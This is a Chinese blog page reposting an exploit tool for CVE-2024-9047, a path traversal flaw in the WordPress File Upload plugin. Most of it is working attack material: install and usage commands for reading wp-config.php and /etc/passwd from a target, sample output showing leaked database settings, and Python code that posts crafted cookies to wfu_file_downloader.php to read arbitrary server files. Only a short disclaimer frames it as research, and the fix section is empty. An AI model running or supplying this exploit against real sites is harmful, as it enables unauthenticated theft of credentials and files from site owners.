首页
看点啥
插画图片
首页 看点啥 WordPress File Upload 插件路径遍历漏洞利用工具: CVE-2024-9047

WordPress File Upload 插件路径遍历漏洞利用工具: CVE-2024-9047

2026-07-05 0

WordPress File Upload 插件路径遍历漏洞利用工具 (CVE-2024-9047)

本项目提供了一个针对 WordPress File Upload 插件中严重安全漏洞的利用脚本。该漏洞(CVE-2024-9047)影响插件 4.24.11 及之前的所有版本,允许未经身份验证的攻击者通过路径遍历读取或删除服务器上的任意文件。

WordPress File Upload 插件路径遍历漏洞利用工具 (CVE-2024-9047)

功能特性

安装指南

系统要求

安装步骤

  1. 克隆或下载本项目代码至本地:

    git clone 
    cd CVE-2024-9047-Exploit
    
  2. 安装 Python 依赖(如果尚未安装 requests):

    pip install requests
    

使用说明

基础用法

python CVE-2024-9047.py --url <目标WordPress站点URL> [--command <目标文件路径>]

典型使用场景

场景一:快速检测漏洞并读取默认配置文件
python CVE-2024-9047.py -u 

工具将自动检测插件版本,若版本 ≤ 4.24.11 且 PHP 环境符合要求,则尝试读取默认的 wp-config.php 文件。

场景二:指定读取其他敏感文件
python CVE-2024-9047.py -u  --command /../../../../../etc/passwd
执行输出示例
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
...

工作流程说明

  1. 漏洞利用:向 /wp-content/plugins/wp-file-upload/wfu_file_downloader.php 发送 POST 请求,携带恶意构造的 Cookie 和表单数据,利用路径遍历读取目标文件。
  2. 结果输出:若攻击成功,则在控制台打印文件内容;否则显示失败状态码。

核心代码

1. 版本检测模块

def check_version(url):
    try:        if response.status_code == 200 and "Stable tag" in response.text:
            for line in response.text.splitlines():
                if "Stable tag" in line:
                    version = line.split(":")[1].strip()
                    print(f"Detected version: {version}")
                    if version <= "4.24.11":
                        print("The site is vulnerable!")
                        return True
                    else:
                        print("The site is not vulnerable.")
                        return False
        else:
            print("Unable to detect the plugin version.")
            return False
    except requests.RequestException as e:
        print(f"Error checking version: {e}")
        return False

2. 核心利用模块

def exploit(url, command):
    try:
        exploit_url = f"{url}/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
        cookies = {
            "wp_wpfileupload_testupload": "Nxploited",
            "wfu_storage_file123": command,
            "wfu_download_ticket_ticket123": "9876543210987",
            "wfu_ABSPATH": "/",
        }
        data = {
            "file": "file123",
            "ticket": "ticket123",
            "handler": "dboption",
            "session_legacy": "1",
            "dboption_base": "cookies",
            "dboption_useold": "0",
            "wfu_cookie": "wp_wpfileupload_testupload",
        }        response = requests.post(exploit_url, cookies=cookies, data=data, timeout=10)        if response.status_code == 200:
            print("Exploit successful! Response:")
            print(response.text)
        else:
            print(f"Exploit failed. Response code: {response.status_code}")
    except requests.RequestException as e:
        print(f"Error during exploitation: {e}")

3. 主控制流程

def main():
    parser = argparse.ArgumentParser(description="The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.")
    parser.add_argument("--url", "-u", required=True, help="Target URL (e.g., )")
    parser.add_argument("--command", "-c", default="/../../../../../opt/lampp/htdocs/wordpress/wp-config.php", help="File path to read")
    args = parser.parse_args()    target_url = args.url.rstrip("/")
    command = args.command    if check_version(target_url):
        exploit(target_url, command)

漏洞修复建议

免责声明

本工具及文档仅限用于安全研究、教育及授权的渗透测试。未经明确授权使用本工具攻击任何系统均属非法行为,使用者需自行承担一切法律责任。项目作者及贡献者对任何滥用行为不承担责任。 6HFtX5dABrKlqXeO5PUv/y6n7EBe6h2V2n05Vq1LwOqLqjbNI15A04sn614rpN95

喜欢(0)

上一篇

vibe coding 之后:我更不想打字了

vibe coding 之后:我更不想打字了

下一篇

智能体5_结构化输出

智能体5_结构化输出
猜你喜欢